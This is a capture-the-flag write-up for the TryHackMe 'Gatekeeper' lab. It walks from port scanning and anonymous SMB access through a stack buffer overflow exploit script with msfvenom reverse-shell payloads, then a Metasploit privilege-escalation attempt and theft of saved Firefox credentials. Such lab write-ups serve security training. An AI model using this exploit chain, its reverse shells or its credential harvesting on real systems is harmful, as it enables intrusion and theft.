THM Gatekeeper |
Can you get past the gate and through the fire?
nmap -p- -T4 -Pn $MACHINE_IP
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-13 13:46 GMT
Nmap scan report for ip-10-10-110-250.eu-west-1.compute.internal (
Host is up (0.00044s latency).
Not shown: 65524 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
MAC Address: 02:D1:76:28:34:57 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1642.77 seconds
sudo nmap -p 135,139,445,3389,31337 -sV -sC -v -Pn -T4 $MACHINE_IP
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-13 14:17 GMT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:17
Completed NSE at 14:17, 0.00s elapsed
Initiating NSE at 14:17
Completed NSE at 14:17, 0.00s elapsed
Initiating ARP Ping Scan at 14:17
Scanning [1 port]
Completed ARP Ping Scan at 14:17, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:17
Completed Parallel DNS resolution of 1 host. at 14:17, 0.00s elapsed
Initiating SYN Stealth Scan at 14:17
Scanning ip-10-10-110-250.eu-west-1.compute.internal ( [5 ports]
Discovered open port 31337/tcp on
Completed SYN Stealth Scan at 14:17, 1.24s elapsed (5 total ports)
Initiating Service scan at 14:17
Scanning 1 service on ip-10-10-110-250.eu-west-1.compute.internal (
Completed Service scan at 14:20, 146.16s elapsed (1 service on 1 host)
NSE: Script scanning
Initiating NSE at 14:20
Completed NSE at 14:20, 0.01s elapsed
Initiating NSE at 14:20
Completed NSE at 14:20, 1.01s elapsed
Nmap scan report for ip-10-10-110-250.eu-west-1.compute.internal (
Host is up (0.00018s latency).
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| HTTPOptions:
| Hello OPTIONS / HTTP/1.0
| Hello
| Help:
| Hello HELP
| Kerberos:
| Hello !!!
| LDAPSearchReq:
| Hello 0
| Hello
| LPDString:
| Hello
| default!!!
| RTSPRequest:
| Hello OPTIONS / RTSP/1.0
| Hello
| SIPOptions:
| Hello OPTIONS sip:nm SIP/2.0
| Hello Via: SIP/2.0/TCP nm;branch=foo
| Hello From: <sip:nm@nm>;tag=root
| Hello To: <sip:nm2@nm2>
| Hello Call-ID: 50000
| Hello CSeq: 42 OPTIONS
| Hello Max-Forwards: 70
| Hello Content-Length: 0
| Hello Contact: <sip:nm@nm>
| Hello Accept: application/sdp
| Hello
| SSLSessionReq, TLSSessionReq:
|_ Hello
1 service unrecognized despite returning data. ...
NSE: Script Post-scanning.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.29 seconds
Raw packets sent: 10 (424B) | Rcvd: 2 (72B)
Interacting with the service on port 31337
nc $MACHINE_IP 31337
Hello !!!
Hello Hi!!!
And with a very long string, gets kicked out.
Using smbclient
to list available shares on the host:
smbclient -L $MACHINE_IP
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Users Disk
SMB1 disabled -- no workgroup available
Using smbclient
to access the Users
share anonymously:
smbclient \\\\$MACHINE_IP\\Users
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu May 14 21:57:08 2020
.. DR 0 Thu May 14 21:57:08 2020
Default DHR 0 Tue Jul 14 03:07:31 2009
desktop.ini AHS 174 Tue Jul 14 00:54:24 2009
Share D 0 Thu May 14 21:58:07 2020
7863807 blocks of size 4096. 3876715 blocks available
smb: \> cd Share
smb: \Share\> ls
. D 0 Thu May 14 21:58:07 2020
.. D 0 Thu May 14 21:58:07 2020
gatekeeper.exe A 13312 Mon Apr 20 01:27:17 2020
7863807 blocks of size 4096. 3876715 blocks available
Getting the gatekeeper.exe
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
Start a web server on the Kali VM in the directory with the files (to download the files to the Windows VM):
python3 -m http.server
Exploiting buffer overflow
Get the binary file from the Kali box and follow the stack-based buffer overflow howto for creating BoF scripts, with:
Offset: 146
JMP ESP address: 080414C3
Bad characters: 00, 0a
Generate payload with msfvenom
IP address of KALI on the THM network):
# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
Putting payload in script:
import socket
ip = ""
port = 31337
offset = 146
overflow = "A" * offset
retn = "\xC3\x14\x04\x08" # JMP ESP address 080414C3
padding = "\x90"*16
postfix = ""
payload = (
buffer = overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
except socket.error:
print("[-] Could not connect.")
Start a listener on Kali:
$ nc -nlvp 4444
listening on [any] 4444 ...
Execute exploit:
$ python3 exploit.py
Sending evil buffer...
Catch it in the listener:
nc -nlvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Get first flag:
Volume in drive C has no label.
Volume Serial Number is 3ABE-D44B
Directory of C:\Users\natbat\Desktop
05/14/2020 08:24 PM <DIR> .
05/14/2020 08:24 PM <DIR> ..
04/21/2020 04:00 PM 1,197 Firefox.lnk
04/20/2020 12:27 AM 13,312 gatekeeper.exe
04/21/2020 08:53 PM 135 gatekeeperstart.bat
05/14/2020 08:43 PM 140 user.txt.txt
4 File(s) 14,784 bytes
2 Dir(s) 15,757,553,664 bytes free
C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
Privilege escalation
Generate meterpreter payload with msfvenom
IP address of KALI on the THM network):
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
Replacing the shellcode in the script:
import socket
ip = ""
port = 31337
offset = 146
overflow = "A" * offset
retn = "\xC3\x14\x04\x08" # JMP ESP address 080414C3
padding = "\x90"*16
postfix = ""
payload = (
buffer = overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
except socket.error:
print("[-] Could not connect.")
Starting msfconsole
, selecting the multi handler module, and setting and running the exploit:
sudo msfconsole -q
[sudo] password for nina:
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on
Executing the script:
python3 exploit2.py
Sending evil buffer...
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on
[*] Sending stage (175686 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-12-14 00:45:32 +0000
meterpreter >
Backgrounding meterpreter:
meterpreter > background
msf6 exploit(multi/handler) > sessions
Active sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/wind GATEKEEPER\natbat @ G -> 1
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > use windows/local/cve_2019_1458_wizardopium
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options
Trying wizardopium for CVE-2019-1458:
msf6 exploit(multi/handler) > use windows/local/cve_2019_1458_wizardopium
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options
Module options (exploit/windows/local/cve_2019_1458_wizardopium):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set SESSION 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options
Module options (exploit/windows/local/cve_2019_1458_wizardopium):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST tun0 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > exploit
[*] Started reverse TCP handler on
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 1872 launched.
[*] Reflectively injecting the DLL into 1872...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
O dear. Back to the drawing board. Ah.
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/firefox_creds
Then use the Firefox Decrypt tool from Github, and log in to the mayor
account using xfreerdp
. The flag is on mayor’s Desktop.